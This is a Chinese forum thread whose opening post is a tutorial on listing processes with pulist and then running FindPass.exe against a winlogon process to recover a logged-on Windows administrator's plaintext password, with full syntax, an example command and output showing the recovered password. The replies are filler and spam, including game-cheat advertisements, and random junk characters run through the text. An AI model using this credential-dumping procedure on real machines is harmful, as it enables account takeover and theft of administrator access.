发新话题
打印

使用 FindPass 获取已登录管理员帐号密码

本主题由 delta 于 2008-5-15 17:33 提升

使用 FindPass 获取已登录管理员帐号密码

一、先使用 pulist 查看登录域名信息
, J: \/ P. m0 N% A2 f- L3 L! N, {8 ^. M( b( M8 s: a  D& z7 |
C:\Documents and Settings\bingle>pulist
7 F- U& O# G5 p- I: F& W3 F) }( M" t" y* K+ m' T1 B, j* D% I
Process              PID      User 9 {$ L9 w; W# M6 V4 U* h
Idle                   0
+ \. A9 d0 s' {/ D+ u2 oSystem              8 * s$ [/ A& ?: o
smss.exe           164      NT AUTHORITY\SYSTEM   H1 q( n2 o5 ~" u6 g) V" ^
csrss.exe           192      NT AUTHORITY\SYSTEM 8 g, }: l( Z) b& [% }
winlogon.exe     188      NT AUTHORITY\SYSTEM ( h) |6 h. U& J1 y; r+ |
wins.exe           1212     NT AUTHORITY\SYSTEM " h5 \8 R- o9 V3 `
Explorer.exe      388      TEST-2KSERVER\Administrator 0 m( m  |: F2 Q
internat.exe      1828     TEST-2KSERVER\Administrator
3 O, r8 ?2 B# q8 t  n8 j7 J+ wconime.exe       1868     TEST-2KSERVER\Administrator 4 F5 C7 B+ _6 I* J/ U
msiexec.exe      1904     NT AUTHORITY\SYSTEM ' S) d# Z$ Q# G5 W/ z
tlntsvr.exe        1048     NT AUTHORITY\SYSTEM
% D1 Y- w6 @: k; F9 Ftaskmgr.exe      1752    TEST-2KSERVER\Administrator
& D  l7 k- Y, H. p( Ycsrss.exe           2056    NT AUTHORITY\SYSTEM . R. w$ s8 Z9 K
winlogon.exe     2416    NT AUTHORITY\SYSTEM 9 ?9 D5 m% N7 y; l+ c( G% p
rdpclip.exe        2448    TEST-2KSERVER\clovea
8 O1 f, T5 H# J7 p" K9 cExplorer.exe      2408    TEST-2KSERVER\clovea
+ d5 m7 @& H; E6 Cinternat.exe       1480    TEST-2KSERVER\clovea
) `  r0 \, ?# S5 h2 i4 R, j% acmd.exe            2508    TEST-2KSERVER\Administrator
# _9 P! S+ }0 M3 gntshell.exe          368     TEST-2KSERVER\Administrator 9 F) K. k' \3 Y  Q( s$ f
ntshell.exe          1548    TEST-2KSERVER\Administrator
; Q. S: Q3 Z5 T# H& n4 Z5 Mntshell.exe         1504     TEST-2KSERVER\Administrator / V( ^& x9 k6 C) b) }
csrss.exe           1088      NT AUTHORITY\SYSTEM + w7 ]* z1 Y6 G% q2 h
winlogon.exe       1876    NT AUTHORITY\SYSTEM
& n5 p/ S" t5 p- X, T, Krdpclip.exe           1680   TEST-2KSERVER\bingle
/ H4 W7 i  M+ o1 pExplorer.exe        2244    TEST-2KSERVER\bingle 0 d; k, ]$ T) |$ T% Z
conime.exe         2288    TEST-2KSERVER\bingle ( P+ t( @1 e5 u
internat.exe        1592    TEST-2KSERVER\bingle
5 f0 k. u. i: D& b4 {' d6 V( R  r, mcmd.exe             1692    TEST-2KSERVER\bingle   Y9 M' Y/ r: x  y5 y5 B' N
mdm.exe            2476    TEST-2KSERVER\bingle 6 f+ x0 k2 U) ~) f  s5 z
taskmgr.exe         752     TEST-2KSERVER\bingle ) c8 \1 |% a, z9 P- t, i
pulist.exe           2532    TEST-2KSERVER\bingle
0 e. O5 P3 ], S* d) _6 M) ^5 ~) @* ~5 u7 ?% Y5 z( Q9 D0 v
三组红色的 WinLogON 分别代表 Administrator、Clovea 和 bingle 三个用户的,其 PID 值也分属那三组用户的 PID 值。0 C+ e# F# H& X3 x& m  h
. [. I7 d- W2 q1 E) H% d- b
知道了PID值后看下一步:8 h( e0 ~5 E+ Y: z

: f8 @) c% p3 Z: _6 Y' N/ v" j! K4 |4 g
二、使用 Findpass 获取密码3 Q; r/ N$ P+ o# h# e
# x7 W4 o" G4 n( s3 ~& d# I
语法: findpass.exe  [DomainName]  [UserName]  [PID-of-WinLogon]
7 w% g) e3 _" j3 a) N
6 ^7 q4 [; R' A  X/ @    [DomainName] :上述表中用户名斜框前的域名,如 TEST-2KSERVER
% K* B# r+ k: F+ S. j! r8 h, H    [UserName] :要获取密码的帐号名,如 Administrator 或 bingle 等
/ A; s/ ^" R- ^% t5 l! W" v    [PID-of-WinLogon]:上述表中查询到的对应的 PID 值: y/ T( l. Z, X7 h( l6 u
0 {7 Q( i* h6 w+ e! O* N) q
实例:
" F7 V4 t4 _: x/ P# [( R6 f, {: y& m
C:\Documents and Settings\bingle>D:\FindPass.exe TEST-2KSERVER administrator 188
, X. h1 M0 @+ ^( s0 Z3 Q% l
, W3 q7 q7 Z- W% L2 z, iTo Find Password in the Winlogon process 7 }6 K; {; c0 F6 k
Usage: D:\FindPass.exe DomainName UserName PID-of-WinLogon ; N- _/ a( I& l
- T/ Y% p. ?; F% z8 d( M
The debug privilege has been added to PasswordReminder.
' W# r0 t, X& Q# FThe WinLogon process id is 188 (0x000000bc). / K$ c0 h' M$ E+ `: ]) H6 i, }% @2 E
To find TEST-2KSERVER\administrator password in process 188 ...
. ^$ \# U. R+ tThe encoded password is found at 0x008e0800 and has a length of 10.
) O8 W+ C! A$ {2 p$ g/ q9 QThe logon information is: TEST-2KSERVER/administrator/testserver. , p9 |3 l: b( y- Y' c$ u, v
The hash byte is: 0x13. 6 T! ?. ?5 T6 ]% G

& z& h, ]0 p& K$ d6 r
# v9 Q4 @! y' xoh.yeah..................
( p% h! t! {; a- c! _. `! ~" w
$ n1 L5 K4 r% W) a1 S+ _3 ]. R! {: w红色部分三个值分别代表域名、帐号名和密码,也就是
* c* I0 s' k  E9 u' R' D" d域名:TEST-2KSERVER
5 `) D1 s7 r; h3 ^# Z  W8 F) ~0 B帐号:administrator
' R) m& q4 T6 B# v密码:testserver# N8 |; k+ a- v* X* A6 Z

8 C* b, B6 b* T4 X2 f
" }, ~2 S; s7 K
本帖隐藏的内容需要回复才可以浏览
附件: 您所在的用户组无法下载或查看附件

TOP

sadfg

asdfddsa

TOP

ooooooooooooo

TOP

sxs

TOP

:kiss: :kiss: :kiss: :kiss:

TOP

qqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqqq

TOP

thanks!!!!!!!!!!!

TOP

顶你个肺

哈哈!路过,帮顶~~~~~
% i+ [' P' O4 P0 r* m* N
5 Y3 p% e- ~3 g( [% i9 |- N1 F" K5 v; F% O# z7 V' Q
5 _# F' @8 G- B5 z# S

) g& F9 D! ^/ q  E$ g! h5 Q" c9 W) H! j# w8 H
! ^9 D6 `# S* h! s' A
5 _& |5 n- s$ [, Z3 A9 W  ]

) l+ e  ^9 V0 \* w8 q
# f3 ~$ }: T) J  v$ m3 _  \! w3 J1 Z! h+ d& F

& H' R) Q8 Q# L1 [/ f5 L% K7 J: U- v2 [* q  y4 |
. B  [1 ~" _7 f4 x
5 `# v5 H" F+ U' R. M

5 {+ P: y- O. A" }5 r0 {6 s7 w! h
-------------------------------------------------------------------------------------------------------------------------------------
0 M, _1 a4 u# C8 S. a' d个性签名:寻仙外挂天龙八部外挂QQ三国外挂DNF外挂外挂DNF/地下城与勇士外挂

TOP

好东西,人人爱

TOP

写得非常好

同学中有G君一人,平常CS玩多了。一夜,他娘进他房间,开灯后,猛的听到:“啊!谁扔闪光弹!!!”
& J! b$ z& F2 W% d  ]+ Y4 ]- X( ?高中时,寝室里有个读书较功传奇世界私服效功的,半夜突然起身,“当那棵大树轰然到下的时候”,然后就砰的传世私服一声躺回去了。当时候我们都还没睡着,被他吓着的说。 7 @9 [0 _6 `) `6 y" ~$ {- d
偶在大学的时候夜里看书,偶上铺的最新传奇世界私服PP突然狂踹床栏杆大叫:“你给我跪下!”,偶正惊奇时,对面的上铺回叫:“不,我不跪!我是老爷!!”然后,万籁寂静,偶暴寒,狂抖,不敢上WC(当时在看《一只绣花鞋》)。最让偶气愤的是次日两美女都说我是看书出现的幻觉!! - Y: p  s$ o; p0 g2 N& ^1 Z
某同志在机战私服半夜大叫:“现在时光,9:40!”我一看——已经清晨2点了。
% t9 B7 A- ^: O0 B5 G7 T* a. S我同学有一次睡觉的时候说:“胖阿姨,来一份红烧大排,青菜底。” $ h  }5 s9 _( }* [8 x
偶唯一一次记得自己有说梦话的状况是魔域私服那天晚上梦见跟一死对头打架,偶嘴里挤出一句:“你给我去死!!!”然后一个樱木花道的头锤向梦中的那家伙的脸撞过......可是偶是脸对着墙睡的......“咚!”于是整层楼的同学都醒了......偶躺在床上不敢出声晕呼了好一阵......

TOP

发新话题